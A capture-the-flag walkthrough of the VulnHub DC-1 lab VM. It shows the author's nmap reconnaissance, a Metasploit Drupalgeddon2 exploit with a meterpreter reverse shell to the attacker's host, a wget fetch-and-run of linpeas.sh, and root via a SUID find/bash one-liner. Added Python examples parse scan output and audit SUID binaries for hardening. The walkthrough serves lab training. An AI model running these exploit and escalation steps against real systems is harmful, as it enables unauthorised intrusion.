DC 1
Author: jason_huawen
Target machine basics
Name: DC: 1
Address:
https://www.vulnhub.com/entry/dc-1,292/
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/DC_1]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.171.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:55:6f:ee 1 60 PCS Systemtechnik GmbH
192.168.56.252 08:00:27:86:65:45 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.252.
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/DC_1]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.252 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-03 22:29 EST
Nmap scan report for localhost (192.168.56.252)
Host is up (0.00023s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Drupal Site | Drupal Site
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache/2.2.22 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 34380/udp6 status
| 100024 1 37326/tcp status
| 100024 1 44788/udp status
|_ 100024 1 59563/tcp6 status
37326/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:86:65:45 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.18 seconds
The NMAP scan shows that the target host has 4 open ports: 22 (SSH), 80 (HTTP), 111 (RPC) and 37326 (RPC).
Getting a shell
Visiting port 80 shows that the target is running the Drupal CMS. Search Metasploit for modules that can be used against it and try them in turn; the second module yields a shell on the target.
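As an added example (not from the original post), here is a small Python parser for nmap's normal (-oN) output, fed with the scan result above as its sample, followed by a defender-side triage of what that scan gives away: the Drupal generator meta tag, the robots.txt list of install and changelog files, a deprecated DSA host key, and rpcbind reachable from the network. The PortInfo, parse_nmap_normal and triage names and the triage rules are my own choices, not anything nmap provides.

```python
import re
from dataclasses import dataclass, field

# Nmap "normal" (-oN) output copied from the scan above; the parser also accepts
# the column-aligned spacing nmap itself emits.
SAMPLE_NMAP = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Drupal Site | Drupal Site
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache/2.2.22 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
37326/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:86:65:45 (Oracle VirtualBox virtual NIC)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# NSE script result lines look like "| name: value" or "|_name: value"
SCRIPT_RE = re.compile(r"^\|_?\s*([\w.-]+):\s*(.*)$")


@dataclass
class PortInfo:
    port: int
    proto: str
    state: str
    service: str
    version: str
    scripts: dict = field(default_factory=dict)


def parse_nmap_normal(text):
    """Return one PortInfo per port line, with NSE script output attached to it."""
    ports, current, last_key = [], None, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = PortInfo(int(m[1]), m[2], m[3], m[4], m[5].strip())
            ports.append(current)
            last_key = None
            continue
        if current is None or not line.startswith("|"):
            continue
        m = SCRIPT_RE.match(line)
        if m:
            last_key = m[1]
            current.scripts[last_key] = m[2].strip()
        elif last_key:  # continuation line of the previous script result
            extra = line.lstrip("|_ ").strip()
            current.scripts[last_key] = (current.scripts[last_key] + " " + extra).strip()
    return ports


def triage(ports):
    """Defender-side findings: what the scan reveals that should be fixed or restricted."""
    findings = []
    for p in ports:
        if p.state != "open":
            continue
        tag = f"{p.port}/{p.proto}"
        if "http-generator" in p.scripts:
            findings.append(f"{tag}: CMS fingerprint leaked via generator meta tag: {p.scripts['http-generator']}")
        if "http-robots.txt" in p.scripts:
            findings.append(f"{tag}: robots.txt enumerates install/changelog files: {p.scripts['http-robots.txt']}")
        if "(DSA)" in p.scripts.get("ssh-hostkey", ""):
            findings.append(f"{tag}: deprecated DSA host key offered; keep only RSA/ECDSA/Ed25519 host keys")
        if p.service in ("rpcbind", "status"):
            findings.append(f"{tag}: {p.service} reachable; firewall it unless NFS/NIS clients need it")
        if p.version:
            findings.append(f"{tag}: version banner exposed: {p.version}")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_nmap_normal(SAMPLE_NMAP)):
        print(finding)
```

Feeding the script a real -oN file instead of SAMPLE_NMAP gives the same structure; the findings list is what goes into a hardening ticket (remove the generator tag, tighten robots.txt and file permissions on the txt files, drop the DSA key, filter 111/tcp).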
msf6 exploit(unix/webapp/drupal_coder_exec) > search drupal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
4 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
5 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
6 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval
msf6 exploit(unix/webapp/drupal_coder_exec) > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options
Module options (exploit/unix/webapp/drupal_drupalgeddon2):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usi
ng-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (PHP In-Memory)
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.56.252
RHOSTS => 192.168.56.252
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
[*] Started reverse TCP handler on 192.168.56.206:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (39927 bytes) to 192.168.56.252
[*] Meterpreter session 1 opened (192.168.56.206:5555 -> 192.168.56.252:48156) at 2022-12-03 22:45:18 -0500
id
meterpreter > id
[-] Unknown command: id
meterpreter > shell
Process 3126 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@DC-1:/var/www$ cat flag1.txt
cat flag1.txt
Every good CMS needs a config file - and so do you.
www-data@DC-1:/var/www$
Got the 1st flag.
www-data@DC-1:/home/flag4$ ls -alh
ls -alh
total 28K
drwxr-xr-x 2 flag4 flag4 4.0K Feb 19 2019 .
drwxr-xr-x 3 root root 4.0K Feb 19 2019 ..
-rw------- 1 flag4 flag4 28 Feb 19 2019 .bash_history
-rw-r--r-- 1 flag4 flag4 220 Feb 19 2019 .bash_logout
-rw-r--r-- 1 flag4 flag4 3.4K Feb 19 2019 .bashrc
-rw-r--r-- 1 flag4 flag4 675 Feb 19 2019 .profile
-rw-r--r-- 1 flag4 flag4 125 Feb 19 2019 flag4.txt
www-data@DC-1:/home/flag4$ cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
www-data@DC-1:/home/flag4$
Got the 4th flag.
Privilege escalation
Upload the linpeas.sh script to the target's /tmp directory, make it executable and run it; the output indicates that the SUID bit on the find binary can be used for privilege escalation:
www-data@DC-1:/home/flag4$ cd /tmp
cd /tmp
www-data@DC-1:/tmp$ wget http://192.168.56.206:8000/linpeas.sh
wget http://192.168.56.206:8000/linpeas.sh
--2022-12-04 13:50:12-- http://192.168.56.206:8000/linpeas.sh
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 765823 (748K) [text/x-sh]
Saving to: `linpeas.sh'
100%[======================================>] 765,823 --.-K/s in 0.007s
2022-12-04 13:50:12 (111 MB/s) - `linpeas.sh' saved [765823/765823]
www-data@DC-1:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@DC-1:/tmp$ ./linpeas.sh
./linpeas.sh
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
╔═══════════════════╗
═════════════════════════════════════════╣ Basic information ╠═════════════════════════════════════════
╚═══════════════════╝
OS: Linux version 3.2.0-6-486 (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb7u1) ) #1 Debian 3.2.102-1
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: DC-1
Writable folder: /run/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strace Not Found
-rwsr-xr-x 1 root root 87K Dec 10 2012 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 31K Apr 13 2011 /bin/ping
-rwsr-xr-x 1 root root 35K Feb 27 2017 /bin/su
-rwsr-xr-x 1 root root 35K Apr 13 2011 /bin/ping6
-rwsr-xr-x 1 root root 67K Dec 10 2012 /bin/umount ---> BSD/Linux(08-1996)
-rwsr-sr-x 1 daemon daemon 50K Oct 4 2014 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 36K Feb 27 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 45K Feb 27 2017 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 31K Feb 27 2017 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 44K Feb 27 2017 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 65K Feb 27 2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root mail 82K Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 159K Jan 6 2012 /usr/bin/find
-rwsr-xr-x 1 root root 916K Feb 11 2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 9.5K Jun 20 2017 /usr/lib/pt_chown ---> GNU_glibc_2.1/2.1.1_-6(08-1999)
-rwsr-xr-x 1 root root 243K Jan 27 2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5.3K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 315K Feb 10 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 83K May 22 2013 /sbin/mount.nfs
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root ssh 126K Jan 27 2018 /usr/bin/ssh-agent
-rwsr-sr-x 1 daemon daemon 50K Oct 4 2014 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 1 root mlocate 30K Sep 25 2010 /usr/bin/mlocate
-rwxr-sr-x 1 root mail 18K Nov 18 2017 /usr/bin/lockfile
-rwxr-sr-x 1 root shadow 49K Feb 27 2017 /usr/bin/chage
-rwxr-sr-x 1 root tty 9.5K Jun 11 2012 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 9.6K Nov 30 2014 /usr/bin/mutt_dotlock
-rwxr-sr-x 1 root tty 18K Dec 10 2012 /usr/bin/wall
-rwxr-sr-x 1 root crontab 34K Jul 4 2012 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 18K Feb 27 2017 /usr/bin/expiry
-rwsr-sr-x 1 root mail 82K Nov 18 2017 /usr/bin/procmail
-rwxr-sr-x 1 root mail 14K Dec 12 2012 /usr/bin/dotlockfile
-rwxr-sr-x 1 root utmp 4.9K Feb 21 2011 /usr/lib/utempter/utempter
-rwxr-sr-x 1 root shadow 30K May 5 2012 /sbin/unix_chkpwd
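The SUID and SGID sections above are exactly what a defender should audit on a schedule. The following Python is an added example (not from the original post, linpeas or GTFOBins): it parses ls -l style lines such as the ones above, flags SUID-root binaries that are known to hand the caller a shell, and prints the chmod u-s remediation. The SHELL_SPAWNERS set is an illustrative subset that I assumed (GTFOBins is the full reference), and the SAMPLE_SUID lines are copied from the enumeration output above. On a live host the same input comes from `find / -perm -4000 -exec ls -l {} +`.

```python
import re

# Illustrative subset (assumption) of binaries that give the caller a shell or
# arbitrary command execution when SUID root; GTFOBins lists many more.
SHELL_SPAWNERS = {
    "find", "bash", "sh", "dash", "env", "awk", "gawk", "perl", "python", "python2",
    "python3", "vim", "vi", "less", "more", "nmap", "man", "lua", "ruby", "php", "node",
}

# ls -l style lines copied from the linpeas output above (the "--->" annotations are ignored).
SAMPLE_SUID = """\
strace Not Found
-rwsr-xr-x 1 root root 87K Dec 10 2012 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 35K Feb 27 2017 /bin/su
-rwsr-sr-x 1 daemon daemon 50K Oct 4 2014 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 45K Feb 27 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 159K Jan 6 2012 /usr/bin/find
-rwsr-xr-x 1 root root 916K Feb 11 2018 /usr/sbin/exim4
-rwxr-sr-x 1 root shadow 49K Feb 27 2017 /usr/bin/chage
-rwsr-xr-- 1 root messagebus 315K Feb 10 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
"""

# perms [ACL marker] links owner group size month day year|time path [---> annotation]
LS_RE = re.compile(
    r"^([-dlcbps][rwxsStT-]{9})[.+]?\s+\d+\s+(\S+)\s+(\S+)\s+\S+\s+\S+\s+\S+\s+\S+\s+(\S+)"
)


def parse_listing(listing):
    """Yield (perms, owner, group, path) for every ls -l style line; skip everything else."""
    for line in listing.splitlines():
        m = LS_RE.match(line)
        if m:
            yield m.groups()


def audit_suid(listing):
    """Return SUID-root binaries that are known shell spawners, each with its remediation."""
    risky = []
    for perms, owner, group, path in parse_listing(listing):
        is_suid = perms[3] in "sS"  # the setuid bit shows in the owner-execute slot
        name = path.rsplit("/", 1)[-1]
        if is_suid and owner == "root" and name in SHELL_SPAWNERS:
            risky.append({"path": path, "owner": owner, "fix": f"chmod u-s {path}"})
    return risky


def count_special(listing):
    """Counts of SUID and SGID entries, a cheap baseline to diff against over time."""
    suid = sgid = 0
    for perms, _, _, _ in parse_listing(listing):
        suid += perms[3] in "sS"
        sgid += perms[6] in "sS"  # the setgid bit shows in the group-execute slot
    return {"suid": suid, "sgid": sgid}


if __name__ == "__main__":
    print(count_special(SAMPLE_SUID))
    for entry in audit_suid(SAMPLE_SUID):
        print(f"{entry['path']} is SUID {entry['owner']} and spawns a shell -> {entry['fix']}")
```

On the sample this reports only /usr/bin/find, which is exactly the vector linpeas pointed at: find has no legitimate reason to be SUID root, and removing the bit closes the path used below. Binaries such as su and passwd are SUID by design and are left alone; the baseline counts are there so that a newly appearing SUID file stands out in the next run.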
Use the method given on the GTFOBins site to escalate privileges:
www-data@DC-1:/tmp$ /usr/bin/find . -exec /bin/sh -p \; -quit
/usr/bin/find . -exec /bin/sh -p \; -quit
/bin/sh: 0: Illegal option -p
/bin/sh: 0: Illegal option -p
/bin/sh: 0: Illegal option -p
/bin/sh: 0: Illegal option -p
www-data@DC-1:/tmp$ ls -alh /usr/bin/find
ls -alh /usr/bin/find
-rwsr-xr-x 1 root root 159K Jan 6 2012 /usr/bin/find
But it failed. /bin/sh on this Debian 7 host is dash, which rejects the -p option (hence the "Illegal option -p" errors); bash does accept -p and then keeps the effective uid 0 inherited from the SUID find instead of dropping it, so changing sh to bash is enough:
www-data@DC-1:/tmp$ find . -exec /bin/bash -p \; -quit
find . -exec /bin/bash -p \; -quit
bash-4.2# cd /root
cd /root
bash-4.2# ls -alh
ls -alh
total 32K
drwx------ 4 root root 4.0K Feb 28 2019 .
drwxr-xr-x 23 root root 4.0K Feb 19 2019 ..
drwx------ 2 root root 4.0K Feb 19 2019 .aptitude
-rw------- 1 root root 44 Feb 28 2019 .bash_history
-rw-r--r-- 1 root root 949 Feb 19 2019 .bashrc
drwxr-xr-x 3 root root 4.0K Feb 19 2019 .drush
-rw-r--r-- 1 root root 140 Nov 20 2007 .profile
-rw-r--r-- 1 root root 173 Feb 19 2019 thefinalflag.txt
bash-4.2# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
bash-4.2#
Lessons learned
- The methods given on GTFOBins cannot always be copied verbatim; they may need to be adjusted to the specific situation.